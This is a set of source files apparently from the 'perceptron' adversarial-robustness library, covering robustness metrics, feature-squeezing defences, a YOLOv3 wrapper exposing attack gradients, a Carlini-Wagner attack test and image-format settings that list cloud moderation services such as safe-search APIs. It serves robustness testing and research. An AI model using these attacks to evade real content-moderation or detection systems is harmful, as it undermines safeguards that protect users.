Keep all the information needed
epsilon : float
The Linf epsilon range for testing
parallel : Bool
whether to parallelize the testing
"""
iloss, ierr = symbolic(adv._model._model, epsilon,\
adv._original_image,\
adv._original_pred,\
parallel=parallel)
if ierr:
is_verified = False
else:
is_verified = True
return is_verified
class NaiveIntervalMetric(IntervalMetric):
@staticmethod
def analyze(a, epsilon, parallel=False):
""" Return whether the example is verified to be save
within the given Linf <= epsilon analyzed by naive
interval analysis.
Parameters
----------
adv : An class:`Adversarial` instance
Keep all the information needed.
epsilon : float
The Linf epsilon range for testing.
parallel : Bool
whether to parallelize the testing
"""
iloss, ierr = naive(a._model._model, epsilon,\
a._original_image,
a._original_pred,\
parallel=parallel)
if ierr:
is_verified = False
else:
is_verified = True
return is_verified
```
#### File: perceptron/benchmarks/translation.py
```python
from abc import abstractmethod
import numpy as np
from tqdm import tqdm
from collections import Iterable
import math
from .base import Metric
from .base import call_decorator
import warnings
class TranslationMetric(Metric):
"""Metric that tests models against translations."""
@call_decorator
def __call__(self, adv, pix_range=None, annotation=None, unpack=True,
abort_early=True, verify=False, epsilons=100):
"""Translate the image until it is misclassified.
Parameters
----------
adv : `numpy.ndarray`
The original, unperturbed input as a `numpy.ndarray`.
pix_range : int or (int, int)
pix_range of pixels for translation attack
annotation : int
The reference label of the original input.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
abort_early : bool
If true, returns when got first adversarial, otherwise
returns when all the iterations are finished.
verify : bool
if True, return verifiable bound
epsilons : int or Iterable[float]
Either Iterable of translation distances or number of
translation levels between 1 and 0 that should be tried.
Epsilons are one minus the contrast level. Epsilons are
not used if verify = True.
"""
if verify is True:
warnings.warn('epsilon is not used in verification mode '
'and abort_early is set to True.')
if isinstance(pix_range, int):
pix_range = (pix_range, pix_range)
if pix_range:
assert len(
pix_range) == 2, "pix_range has to be float of pix_range or' \
' (pix_range_low, pix_range_high)"
assert pix_range[0] <= pix_range[1], "pix_range[0] should be'\
' smaller than pix_range[1]"
a = adv
del adv
del annotation
del unpack
image = a.original_image
min_, max_ = a.bounds()
axis = a.channel_axis(batch=False)
hw = [image.shape[i] for i in range(image.ndim) if i != axis]
img_width, img_height = hw
translate_type, translate_max_bound = self._get_type(hw)
if verify:
epsilons_ub = np.arange(1, translate_max_bound, 1)
epsilons_lb = np.arange(-1, -1 * translate_max_bound, -1)
elif not isinstance(epsilons, Iterable):
if not pix_range:
range_max = translate_max_bound
range_min = -1 * translate_max_bound
else:
range_max = pix_range[1]
range_min = pix_range[0]
if range_min >= 0:
epsilons = np.minimum(translate_max_bound, epsilons)
epsilons_ub = np.linspace(
range_min, range_max, num=epsilons)
epsilons_lb = []
elif range_max <= 0:
epsilons = np.minimum(translate_max_bound, epsilons)
epsilons_ub = []
epsilons_lb = np.linspace(
range_max, range_min, num=epsilons)
else:
epsilons = np.minimum(2 * translate_max_bound, epsilons)
epsilons_ub = np.linspace(
0, range_max, num=epsilons / 2 + 1)[1:]
epsilons_lb = np.linspace(
0, range_min, num=epsilons / 2 + 1)[1:]
else:
epsilons_ub = epsilons
epsilons_lb = []
epsilons_ub = epsilons_ub.astype(int)
epsilons_lb = epsilons_lb.astype(int)
upper_bound = 0
lower_bound = 0
if axis == 0:
image_cv = np.transpose(image, (1, 2, 0))
elif axis == 2:
image_cv = np.copy(image)
else:
raise ValueError('Invalid axis.')
import cv2
print('Generating adversarial examples.')
for idx, epsilon in enumerate(tqdm(epsilons_ub)):
epsilon = int(epsilon)
if translate_type == 'horizontal':
M = np.float32([[1, 0, epsilon], [0, 1, 0]])
elif translate_type == 'vertical':
M = np.float32([[1, 0, 0], [0, 1, epsilon]])
else:
raise ValueError('Invalid translate_type')
perturbed = cv2.warpAffine(image_cv, M, (img_width, img_height))
if axis == 0:
perturbed = np.transpose(perturbed, (2, 0, 1))
_, is_adversarial = a.predictions(perturbed)
if is_adversarial:
epsilon_ub_idx = idx
perturbed_ub = perturbed
if abort_early or verify:
break
else:
upper_bound = epsilon
a.verifiable_bounds = (upper_bound, lower_bound)
for idx, epsilon in enumerate(tqdm(epsilons_lb)):
epsilon = int(epsilon)
if translate_type == 'horizontal':
M = np.float32([[1, 0, epsilon], [0, 1, 0]])
elif translate_type == 'vertical':
M = np.float32([[1, 0, 0], [0, 1, epsilon]])
else:
raise ValueError('Invalid translate_type')
perturbed = cv2.warpAffine(image_cv, M, (img_width, img_height))
if axis == 0:
perturbed = np.transpose(perturbed, (2, 0, 1))
_, is_adversarial = a.predictions(perturbed)
if is_adversarial:
epsilon_lb_idx = idx
perturbed_lb = perturbed
if abort_early or verify:
break
else:
lower_bound = epsilon
a.verifiable_bounds = (upper_bound, lower_bound)
return
@abstractmethod
def _get_type(self, hw):
raise NotImplementedError
class HorizontalTranslationMetric(TranslationMetric):
"""Horizontally Translate the image until it is misclassified."""
def _get_type(self, hw):
return 'horizontal', hw[1]
class VerticalTranslationMetric(TranslationMetric):
"""Vertically Translate the image until it is misclassified."""
def _get_type(self, hw):
return 'vertical', hw[0]
```
#### File: perceptron/defences/filters.py
```python
import numpy as np
from scipy import ndimage
import cv2
class BinaryFilter():
"""Binary filter as feature squeezer as described in [1]_.
References
----------
.. [1] Weilin et: "Feature Squeezing: Detecting Adversarial
Examples in Deep Neural Networks.
"""
def __init__(self):
pass
def __call__(self, img_batch_np, threshold):
"""Squeeze image by binary filter
Parameters
----------
img_batch_np : array
Input image batch or image
threshold : float
Threshold for binarlize
"""
x_bin = np.maximum(np.sign(img_batch_np - threshold), 0)
return x_bin
class BinaryRandomFilter():
"""Binary filter with randomness."""
def __init__(self):
pass
def __call__(self, img_batch_np, threshold, stddev=0.125):
"""Squeeze noise added image by binary filter.
Parameters
----------
img_batch_np : array
Input image batch or image
threshold : float
Threshold for binarlize
stddev : float
Standard deviation for gaussian nosie
"""
if stddev == 0.:
rand_array = np.zeros(img_batch_np.shape)
else:
rand_array = np.random.normal(loc=0.,
scale=stddev,
size=img_batch_np.shape)
x_bin = np.maximum(np.sign(np.add(img_batch_np,
rand_array) - threshold), 0)
return x_bin
class MedianFilter():
"""Median filter as feature squeezer as described in [1]_.
References
----------
.. [1] Weilin et: "Feature Squeezing: Detecting Adversarial
Examples in Deep Neural Networks.
"""
def __init__(self):
pass
def __call__(self, img_batch_np, width, height=-1):
"""Squeeze image by meadia filter
Parameters
----------
img_batch_np : array
Input image batch or image
width : int
The width of the sliding window (number of pixels)
height : int
The height of the window. The same as width by default.
"""
if height == -1:
height = width
x_mid = ndimage.filters.median_filter(img_batch_np,
size=(1, width, height, 1),
mode='reflect'
)
return x_mid
```
#### File: models/detection/keras_yolov3.py
```python
from __future__ import absolute_import
import numpy as np
import logging
import os
from perceptron.models.base import DifferentiableModel
from perceptron.utils.criteria.detection import TargetClassMiss, RegionalTargetClassMiss
from keras import backend as K
import keras
class KerasYOLOv3Model(DifferentiableModel):
"""Create a :class:`Model` instance from a `Keras` model.
Parameters
----------
model : `keras.model.Model`
The `Keras` model that are loaded.
bounds : tuple
Tuple of lower and upper bound for the pixel values, usually
(0, 1) or (0, 255).
model_image_shape : tuple
Tuple of the model input shape in format (height, width).
channel_axis : int
The index of the axis that represents color channels.
num_scales : int
Number of scales, if the model detects object at
different distances.
num_anchors : int
Number of anchor boxes for each scale.
num_classes : int
Number of classes for which the model will output predictions.
max_boxes : int
The maximum number of boxes allowed in the prediction output.
anchors_path : str
The path to the file containing anchor box coordinates.
classes_path : str
The path to the file containing class names.
score : float
The score threshold for considering a box as containing objects.
iou : float
The intersection over union (IoU) threshold.
preprocessing: 2-element tuple with floats or numpy arrays
Elementwises preprocessing of input; we first substract the first
element of preprocessing from the input and then divide the input
by the second element.
"""
def __init__(
self,
model,
bounds,
model_image_shape=(416, 416),
channel_axis=3,
num_scales=3,
num_anchors=3,
num_classes=80,
max_boxes=20,
anchors_path='yolov3_anchors.txt',
classes_path='coco_classes.txt',
score=0.3,
iou=0.45,
preprocessing=(0, 1)):
super(KerasYOLOv3Model, self).__init__(bounds=bounds,
channel_axis=channel_axis,
preprocessing=preprocessing)
# Check if model data files exist.
model_data_path = os.path.join(
os.path.dirname(__file__),
'../../zoo/yolov3/model_data/')
model_input = model.input
model_output = model.output
# model_output should be list of ndarrays.
assert len(model_output) == num_scales, \
"number of scales doesn't match model output"
logits_per_grid = model_output[0].shape[-1]
assert (num_classes + 5) * num_anchors == logits_per_grid, \
"number of logits per grid cell doesn't match model output"
self._task = 'det'
self._model_image_shape = model_image_shape
self._num_classes = num_classes
self._num_scales = num_scales
self._num_anchors = num_anchors
self._classes_path = os.path.join(model_data_path, classes_path)
self._class_names = self.get_class()
self._anchors_path = os.path.join(model_data_path, anchors_path)
self._anchors = self._get_anchors()
self._score = score
self._iou = iou
self._max_boxes = max_boxes
_boxes, _box_scores, _box_confidence_logits, \
_box_class_probs_logits, _box_coord_logits = self._gather_feats(
model_output, self._anchors,
self._num_classes, self._model_image_shape)
boxes, scores, classes = self._eval_pred(
_boxes, _box_scores, self._num_classes,
self._max_boxes, self._score, self._iou)
# For attack use only.
target_class = K.placeholder(dtype='int32')
tgt_cls_loss = self._target_class_loss(
target_class, _box_scores, _box_class_probs_logits)
tgt_cls_gradient = K.gradients(tgt_cls_loss, model_input)
tgt_cls_gradient = tgt_cls_gradient[0]
tgt_cls_gradient = K.squeeze(tgt_cls_gradient, axis=0)
self._batch_gather_feats_fn = K.function(
[model_input],
[_boxes, _box_scores, _box_confidence_logits,
_box_class_probs_logits, _box_coord_logits])
self._batch_pred_fn = K.function(
[_boxes, _box_scores],
[boxes, scores, classes]
)
self._tgt_cls_bw_grad_fn = K.function(
[target_class, model_input],
[tgt_cls_loss, tgt_cls_gradient]
)
self._tgt_cls_pred_and_grad_fn = K.function(
[model_input, target_class],
[boxes, scores, classes, tgt_cls_loss, tgt_cls_gradient]
)
def get_class(self):
classes_path = os.path.expanduser(self._classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def _get_anchors(self):
anchors_path = os.path.expanduser(self._anchors_path)
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def num_classes(self):
"""Return the number of classes."""
return self._num_classes
def class_names(self):
"""Return the class names as list."""
return self._class_names
def model_task(self):
"""Return the task of the model: classification of detection."""
return self._task
def batch_predictions(self, images):
"""Batch prediction of images.
Parameters
----------
images : `numpy.ndarray`
The input image in [b, h, n, c] ndarry format.
Returns
-------
list
List of batch prediction resutls.
Each element is a dictionary containing:
{'boxes', 'scores', 'classes}
"""
px, _ = self._process_input(images)
_boxes, _box_scores, _box_confidence_logits, \
_box_class_probs_logits, _box_coord_logits = \
self._batch_gather_feats_fn([px])
boxes, scores, classes = self._batch_pred_fn(
[_boxes, _box_scores])
predictions = []
for i in range(len(boxes)):
num = (scores[i] > 0.).sum()
pred = {}
pred['boxes'] = boxes[i][:num].tolist()
pred['scores'] = scores[i][:num].tolist()
pred['classes'] = classes[i][:num].tolist()
predictions.append(pred)
assert len(predictions) == images.shape[0], "batch size doesn't match."
return predictions
def predictions_and_gradient(self, image, criterion):
""" Returns both predictions and gradients, and
potentially loss w.r.t. to certain criterion.
"""
input_shape = image.shape
px, dpdx = self._process_input(image)
if isinstance(criterion, TargetClassMiss) or \
isinstance(criterion, RegionalTargetClassMiss):
boxes, scores, classes, loss, gradient =\
self._tgt_cls_pred_and_grad_fn(
[px[np.newaxis], criterion.target_class()])
else:
raise NotImplementedError
prediction = {}
num = (scores[0] > 0.).sum()
prediction['boxes'] = boxes[0][:num].tolist()
prediction['scores'] = scores[0][:num].tolist()
prediction['classes'] = classes[0][:num].tolist()
gradient = self._process_gradient(dpdx, gradient)
assert gradient.shape == input_shape
return prediction, loss, gradient,
def backward(self, target_class, image):
"""Get gradient with respect to the image."""
px, dpdx = self._process_input(image)
loss, gradient = self._tgt_cls_bw_grad_fn([
target_class,
px[np.newaxis],
])
gradient = self._process_gradient(dpdx, gradient)
return loss, gradient
def _gather_feats(
self,
yolo_outputs,
anchors,
num_classes,
image_shape):
"""Evaluate model output to get _boxes and _boxes_scores logits.
"""
num_layers = len(yolo_outputs)
anchor_mask = [[6, 7, 8], [3, 4, 5], [0, 1, 2]] \
if num_layers == 3 else [[3, 4, 5], [1, 2, 3]] # default setting
input_shape = K.shape(yolo_outputs[0])[1:3] * 32
batch_size = K.shape(yolo_outputs[0])[0]
boxes = []
box_scores = []
box_coord_logits = []
box_confidence_logits = []
box_class_probs_logits = []
for l in range(num_layers):
_boxes, _box_scores, _box_coord_logits, \
_box_confidence_logits, _box_class_probs_logits =\
self._boxes_and_scores(
yolo_outputs[l], anchors[anchor_mask[l]],
num_classes, input_shape, image_shape, batch_size,
verbose=True)
boxes.append(_boxes)
box_scores.append(_box_scores)
box_coord_logits.append(_box_coord_logits)
box_confidence_logits.append(_box_confidence_logits)
box_class_probs_logits.append(_box_class_probs_logits)
boxes = K.concatenate(boxes, axis=1) # [batch_size, num_boxes, 4]
box_scores = K.concatenate(box_scores, axis=1)
box_coord_logits = K.concatenate(box_coord_logits, axis=1)
box_confidence_logits = K.concatenate(box_confidence_logits, axis=1)
box_class_probs_logits = K.concatenate(box_class_probs_logits, axis=1)
return boxes, box_scores, box_confidence_logits, \
box_class_probs_logits, box_coord_logits
def _target_class_loss(
self,
target_class,
box_scores,
box_class_probs_logits):
""" Evaluate target_class_loss w.r.t. the input.
"""
box_scores = K.squeeze(box_scores, axis=0)
box_class_probs_logits = K.squeeze(box_class_probs_logits, axis=0)
import tensorflow as tf
boi_idx = tf.where(box_scores[:, target_class] > self._score)
loss_box_class_conf = tf.reduce_mean(
tf.gather(box_class_probs_logits[:, target_class], boi_idx))
# Avoid the propagation of nan
return tf.cond(
tf.is_nan(loss_box_class_conf),
lambda: tf.constant(0.),
lambda: loss_box_class_conf)
def _eval_pred(
self,
boxes,
box_scores,
num_classes,
max_boxes=20,
score_threshold=.6,
iou_threshold=.5):
""" Evaluate logits for boxes and scores to final boxes, class, scores
results
"""
import tensorflow as tf
def process_batch(params):
boxes, box_scores = params
mask = box_scores >= score_threshold
max_boxes_tensor = K.constant(max_boxes, dtype='int32')
boxes_ = []
scores_ = []
classes_ = []
for c in range(num_classes):
# TODO: use keras backend instead of tf.
class_boxes = tf.boolean_mask(boxes, mask[:, c])
class_box_scores = tf.boolean_mask(
box_scores[:, c], mask[:, c])
nms_index = tf.image.non_max_suppression(
class_boxes, class_box_scores,
max_boxes_tensor, iou_threshold=iou_threshold)
class_boxes = K.gather(class_boxes, nms_index)
class_box_scores = K.gather(class_box_scores, nms_index)
classes = K.ones_like(class_box_scores, 'int32') * c
boxes_.append(class_boxes)
scores_.append(class_box_scores)
classes_.append(classes)
boxes_ = K.concatenate(boxes_, axis=0)
scores_ = K.concatenate(scores_, axis=0)
classes_ = K.concatenate(classes_, axis=0)
pad_len = max_boxes - tf.shape(boxes_)[0]
pad_boxes = tf.zeros([pad_len, 4], dtype=tf.float32)
pad_scores = tf.zeros(pad_len, dtype=tf.float32)
pad_classes = tf.zeros(pad_len, dtype=tf.int32)
boxes_ = tf.concat([boxes_, pad_boxes], axis=0)
scores_ = tf.concat([scores_, pad_scores], axis=0)
classes_ = tf.concat([classes_, pad_classes], axis=0)
return boxes_, scores_, classes_
boxes_, scores_, classes_ = tf.map_fn(
process_batch,
(boxes, box_scores),
dtype=(tf.float32, tf.float32, tf.int32))
return boxes_, scores_, classes_
def _boxes_and_scores(
self, feats, anchors, num_classes,
input_shape, image_shape, batch_size, verbose=False):
""" Convert Conv layer output to boxes.
Multiply box_confidence with class_confidence to get real
box_scores for each class.
Parameters
----------
feats : `Tensor`
Elements in the output list from `K.model.output`,
shape = (N, 13, 13, 255).
anchors : list
anchors.
num_classes : int
num of classes.
input_shape: tuple
input shape obtained from model output grid information.
image_shape: tuple
placeholder for ORIGINAL image data shape.
"""
if verbose is True:
box_xy, box_wh, box_confidence, box_class_probs, \
box_coord_logits, box_confidence_logits, \
box_class_probs_logits = self._model_head(
feats, anchors, num_classes, input_shape,
batch_size, verbose=verbose)
else:
box_xy, box_wh, box_confidence, box_class_probs = self._model_head(
feats, anchors, num_classes, input_shape, batch_size)
boxes = self._correct_boxes(
box_xy, box_wh, input_shape, image_shape)
boxes = K.reshape(boxes, [batch_size, -1, 4])
box_scores = box_confidence * box_class_probs
box_scores = K.reshape(box_scores, [batch_size, -1, num_classes])
if verbose is True:
box_coord_logits = K.reshape(
box_coord_logits, [batch_size, -1, 4])
box_confidence_logits = K.reshape(
box_confidence_logits, [batch_size, -1])
box_class_probs_logits = K.reshape(
box_class_probs_logits, [batch_size, -1, num_classes])
return boxes, box_scores, box_coord_logits,\
box_confidence_logits, box_class_probs_logits
return boxes, box_scores
def _model_head(
self, feats, anchors, num_classes,
input_shape, batch_size, calc_loss=False, verbose=False):
"""Convert final layer features to bounding box parameters.
No threshold or nms applied yet.
Args:
feats : `Tensor`
Elements in the output list from K.model.output:
shape = (N, 13, 13, 255)
anchors : list
anchors.
num_classes : int
num of classes.
input_shape : tuple
input shape obtained from model output grid information.
Returns:
Breaking the (num_class + 5) output logits into box_xy,
box_wh, box_confidence, and box_class_probs.
"""
num_anchors = len(anchors)
# Reshape to batch, height, width, num_anchors, box_params.
anchors_tensor = K.reshape(
K.constant(anchors), [1, 1, 1, num_anchors, 2])
grid_shape = K.shape(feats)[1:3] # height, width
grid_y = K.tile(
K.reshape(K.arange(0, stop=grid_shape[0]), [-1, 1, 1, 1]),
[1, grid_shape[1], 1, 1])
grid_x = K.tile(
K.reshape(K.arange(0, stop=grid_shape[1]), [1, -1, 1, 1]),
[grid_shape[0], 1, 1, 1])
grid = K.concatenate([grid_x, grid_y])
grid = K.cast(grid, K.dtype(feats))
feats = K.reshape(
feats, [-1, batch_size, grid_shape[0],
grid_shape[1], num_anchors, num_classes + 5])
# Adjust preditions to each spatial grid point and anchor size.
box_xy = (K.sigmoid(feats[..., :2]) + grid) /\
K.cast(grid_shape[::-1], K.dtype(feats))
box_wh = K.exp(feats[..., 2:4]) * anchors_tensor /\
K.cast(input_shape[::-1], K.dtype(feats))
box_confidence = K.sigmoid(feats[..., 4:5])
box_class_probs = K.sigmoid(feats[..., 5:])
if calc_loss is True:
return grid, feats, box_xy, box_wh
if verbose is True:
# In verbose mode, return logits BEFORE sigmoid activation
box_coord_logits = feats[..., :4]
box_confidence_logits = feats[..., 4: 5]
box_class_probs_logits = feats[..., 5:]
return box_xy, box_wh, box_confidence, box_class_probs, \
box_coord_logits, box_confidence_logits, \
box_class_probs_logits
return box_xy, box_wh, box_confidence, box_class_probs
def _correct_boxes(
self, box_xy, box_wh, input_shape, image_shape):
"""Get corrected boxes, which are scaled to original shape."""
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
input_shape = K.cast(input_shape, K.dtype(box_yx))
image_shape = K.cast(image_shape, K.dtype(box_yx))
new_shape = K.round(image_shape * K.min(input_shape / image_shape))
offset = (input_shape - new_shape) / 2. / input_shape
scale = input_shape / new_shape
box_yx = (box_yx - offset) * scale
box_hw *= scale
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
boxes = K.concatenate([
box_mins[..., 0:1], # y_min
box_mins[..., 1:2], # x_min
box_maxes[..., 0:1], # y_max
box_maxes[..., 1:2] # x_max
])
# Scale boxes back to original image shape.
boxes *= K.concatenate([image_shape, image_shape])
return boxes
```
#### File: perceptron/tests/test_attack_carlini_wagner.py
```python
from __future__ import absolute_import
# To be removed later
import sys
sys.path.append('/workspace/projects/baidu/aisec/perceptron')
from perceptron.utils.criteria.classification import Misclassification
from perceptron.utils.image import imagenet_example
from perceptron.utils.image import load_image
from perceptron.attacks import CarliniWagnerL2Attack as Attack
import numpy as np
def test_untargeted_vgg16(image, label=None):
import torch
import torchvision.models as models
from perceptron.models.classification import PyTorchModel
mean = np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1))
std = np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))
vgg16 = models.vgg16(pretrained=True).eval()
if torch.cuda.is_available():
vgg16 = vgg16.cuda()
model = PyTorchModel(
vgg16, bounds=(0, 1), num_classes=1000, preprocessing=(mean, std))
print(np.argmax(model.predictions(image)))
attack = Attack(model, criterion=Misclassification())
print(image.shape)
adversarial = attack(image, label, unpack=True)
def test_untargeted_resnet18(image, label=None):
import torch
import torchvision.models as models
from perceptron.models.classification import PyTorchModel
mean = np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1))
std = np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))
resnet18 = models.resnet18(pretrained=True).eval()
if torch.cuda.is_available():
resnet18 = resnet18.cuda()
model = PyTorchModel(
resnet18, bounds=(0, 1), num_classes=1000, preprocessing=(mean, std))
print(np.argmax(model.predictions(image)))
attack = Attack(model, criterion=Misclassification())
adversarial = attack(image, label, unpack=True)
if __name__ == "__main__":
image = load_image(
shape=(224, 224), data_format='channels_first', fname='car.png')
image = image / 255.
label = 644
test_untargeted_vgg16(image, label)
```
#### File: utils/adversarial/base.py
```python
import numpy as np
import numbers
from abc import ABC
from perceptron.utils.distances import MSE
from perceptron.utils.distances import Distance
class StopAttack(Exception):
"""Exception thrown to request early stopping of an attack
if a given (optional!) threshold is reached.
"""
pass
class Adversarial(ABC):
"""Defines the base class of an adversarial that should be found and
stores the result. The :class:`Adversarial` class represents a single
adversarial example for a given model, criterion and reference image.
It can be passed to an adversarial attack to find the actual adversarial.
Parameters
----------
model : a :class:`Model` instance
The model that should be evaluated against the adversarial.
criterion : a :class:`Criterion` instance
The criterion that determines which images are adversarial.
original_image : a :class:`numpy.ndarray`
The original image to which the adversarial image should
be as close as possible.
original_pred : int(ClsAdversarial) or dict(DetAdversarial)
The ground-truth predictions of the original image.
distance : a :class:`Distance` class
The measure used to quantify similarity between images.
threshold : float or :class:`Distance`
If not None, the attack will stop as soon as the adversarial
perturbation has a size smaller than this threshold. Can be
an instance of the :class:`Distance` class passed to the distance
argument, or a float assumed to have the same unit as the
the given distance. If None, the attack will simply minimize
the distance as good as possible. Note that the threshold only
influences early stopping of the attack; the returned adversarial
does not necessarily have smaller perturbation size than this
threshold; the `reached_threshold()` method can be used to check
if the threshold has been reached.
"""
def __init__(
self,
model,
criterion,
original_image,
original_pred=None,
threshold=None,
distance=MSE,
verbose=False):
self._model = model
self._criterion = criterion
self._original_image = original_image
self._original_image_for_distance = original_image
self._original_pred = original_pred
self._distance = distance
if threshold is not None and not isinstance(threshold, Distance):
threshold = distance(value=threshold)
self._threshold = threshold
self.verbose = verbose
self._best_adversarial = None
self._best_distance = distance(value=np.inf)
self._best_adversarial_output = None
self._total_prediction_calls = 0
self._total_gradient_calls = 0
self._best_prediction_calls = 0
self._best_gradient_calls = 0
# used for attacks that can provide a verifiable bound
self._verifiable_bounds = (0., 0.)
# check if the original image is already adversarial
try:
self.predictions(original_image)
except StopAttack:
# if a threshold is specified and the original input is
# misclassified, this can already cause a StopAttack
# exception
assert self._distance.value == 0.
def _reset(self):
self._best_adversarial = None
self._best_distance = self._distance(value=np.inf)
self._best_adversarial_output = None
self._best_prediction_calls = 0
self._best_gradient_calls = 0
self.predictions(self._original_image)
@property
def verifiable_bounds(self):
"""The verifiable bounds obtained so far."""
return self._verifiable_bounds
@verifiable_bounds.setter
def verifiable_bounds(self, bounds):
"""The setter of verifiable bounds"""
self._verifiable_bounds = bounds
@property
def image(self):
"""The best adversarial found so far."""
return self._best_adversarial
@property
def output(self):
"""The model predictions for the best adversarial found so far.
None if no adversarial has been found.
"""
return self._best_adversarial_output
@property
def distance(self):
"""The distance of the adversarial input to the original input."""
return self._best_distance
@property
def original_image(self):
"""The original input."""
return self._original_image
@property
def original_pred(self):
"""The original label."""
return self._original_pred
def set_distance_dtype(self, dtype):
"""Set the dtype of Distance."""
assert dtype >= self._original_image.dtype
self._original_image_for_distance = self._original_image.astype(
dtype, copy=False)
def reset_distance_dtype(self):
"""Reset the dtype of Distance."""
self._original_image_for_distance = self._original_image
def normalized_distance(self, image):
"""Calculates the distance of a given image to the
original image.
Parameters
----------
image : `numpy.ndarray`
The image that should be compared to the original image.
Returns
-------
:class:`Distance`
The distance between the given image and the original image.
"""
return self._distance(
self._original_image_for_distance,
image,
bounds=self.bounds())
def reached_threshold(self):
"""Returns True if a threshold is given and the currently
best adversarial distance is smaller than the threshold."""
return self._threshold is not None \
and self._best_distance <= self._threshold
def target_class(self):
"""Interface to criterion.target_class for attacks.
"""
try:
target_class = self._criterion.target_class()
except AttributeError:
target_class = None
return target_class
def num_classes(self):
"""Return number of classes."""
n = self._model.num_classes()
assert isinstance(n, numbers.Number)
return n
def bounds(self):
"""Return bounds of model."""
min_, max_ = self._model.bounds()
assert isinstance(min_, numbers.Number)
assert isinstance(max_, numbers.Number)
assert min_ < max_
return min_, max_
def in_bounds(self, input_):
"""Check if input is in bounds."""
min_, max_ = self.bounds()
return min_ <= input_.min() and input_.max() <= max_
def channel_axis(self, batch):
""" Interface to model.channel_axis for attacks.
Parameters
----------
batch : bool
Controls whether the index of the axis for a batch of images
(4 dimensions) or a single image (3 dimensions) should be
returned.
"""
axis = self._model.channel_axis()
if not batch:
axis = axis - 1
return axis
def has_gradient(self):
""" Returns true if _backward and _forward_backward can be called
by an attack, False otherwise.
"""
try:
self._model.gradient
self._model.predictions_and_gradient
except AttributeError:
return False
else:
return True
def _new_adversarial(self, image, predictions, in_bounds):
image = image.copy() # to prevent accidental inplace changes
distance = self.normalized_distance(image)
if in_bounds and self._best_distance > distance:
# new best adversarial
if self.verbose:
print('new best adversarial: {}'.format(distance))
self._best_adversarial = image
self._best_distance = distance
self._best_adversarial_output = predictions
self._best_prediction_calls = self._total_prediction_calls
self._best_gradient_calls = self._total_gradient_calls
if self.reached_threshold():
raise StopAttack
return True, distance
return False, distance
def _is_adversarial(self, image, predictions, in_bounds):
"""Interface to `criterion.is_adversary()` that calls
_new_adversarial if necessary.
Parameters
----------
image : `numpy.ndarray`
Image with shape (height, width, channels).
predictions : :class:`numpy.ndarray`
A vector with the predictions for some image.
label : int
The label of the unperturbed reference image.
"""
is_adversarial = self._criterion.is_adversarial(
predictions, self._original_pred)
assert isinstance(is_adversarial, bool) or \
isinstance(is_adversarial, np.bool_)
if is_adversarial:
is_best, distance = self._new_adversarial(
image, predictions, in_bounds)
else:
is_best = False
distance = None
return is_adversarial, is_best, distance
def predictions(self, image, strict=True, return_details=False):
"""Interface to model.predictions for attacks.
Parameters
----------
image : `numpy.ndarray`
Image with shape (height, width, channels).
strict : bool
Controls if the bounds for the pixel values should be checked.
"""
in_bounds = self.in_bounds(image)
assert not strict or in_bounds
self._total_prediction_calls += 1
predictions = self._model.predictions(image)
is_adversarial, is_best, distance = self._is_adversarial(
image, predictions, in_bounds)
if return_details:
return predictions, is_adversarial, is_best, distance
else:
return predictions, is_adversarial
def batch_predictions(
self, images, greedy=False, strict=True, return_details=False):
"""Interface to model.batch_predictions for attacks.
Parameters
----------
images : `numpy.ndarray`
Batch of images with shape (batch, height, width, channels).
greedy : bool
Whether the first adversarial should be returned.
strict : bool
Controls if the bounds for the pixel values should be checked.
"""
if strict:
in_bounds = self.in_bounds(images)
assert in_bounds
self._total_prediction_calls += len(images)
predictions = self._model.batch_predictions(images)
assert predictions.ndim == 2
assert predictions.shape[0] == images.shape[0]
if return_details:
assert greedy
adversarials = []
for i in range(len(predictions)):
if strict:
in_bounds_i = True
else:
in_bounds_i = self.in_bounds(images[i])
is_adversarial, is_best, distance = self._is_adversarial(
images[i], predictions[i], in_bounds_i)
if is_adversarial and greedy:
if return_details:
return predictions, is_adversarial, i, is_best, distance
else:
return predictions, is_adversarial, i
adversarials.append(is_adversarial)
if greedy: # pragma: no cover
# no adversarial found
if return_details:
return predictions, False, None, False, None
else:
return predictions, False, None
is_adversarial = np.array(adversarials)
assert is_adversarial.ndim == 1
assert is_adversarial.shape[0] == images.shape[0]
return predictions, is_adversarial
def gradient(self, image=None, label=None, strict=True):
"""Interface to model.gradient for attacks.
Parameters
----------
image : `numpy.ndarray`
Image with shape (height, width, channels).
Defaults to the original image.
label : int
Label used to calculate the loss that is differentiated.
Defaults to the original label.
strict : bool
Controls if the bounds for the pixel values should be checked.
"""
raise NotImplementedError
def predictions_and_gradient(
self, image=None, label=None, strict=True, return_details=False):
"""Interface to model.predictions_and_gradient for attacks.
Parameters
----------
image : `numpy.ndarray`
Image with shape (height, width, channels).
Defaults to the original image.
label : int
Label used to calculate the loss that is differentiated.
Defaults to the original label.
strict : bool
Controls if the bounds for the pixel values should be checked.
"""
raise NotImplementedError
def backward(self, gradient, image=None, strict=True):
raise NotImplementedError
```
#### File: perceptron/utils/tools.py
```python
from perceptron.utils.image import load_image
import matplotlib.pyplot as plt
class bcolors:
RED = "\033[1;31m"
BLUE = "\033[1;34m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RESET = "\033[0;0m"
BOLD = "\033[;1m"
REVERSE = "\033[;7m"
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_image_format(framework_name, model_name):
"""Return the correct input range and shape for target framework and model"""
special_shape = {'pytorch':{'inception_v3': (299, 299)},
'keras': {'xception': (299, 299),
'inception_v3':(299, 299),
'yolo_v3': (416, 416),
'ssd300': (300, 300)}}
special_bound = {'keras':{'vgg16':(0, 255),
'vgg19':(0, 255),
'resnet50':(0, 255),
'ssd300': (0, 255)},
'cloud': {'aip_antiporn': (0, 255),
'google_safesearch': (0, 255),
'google_objectdetection': (0, 255)}}
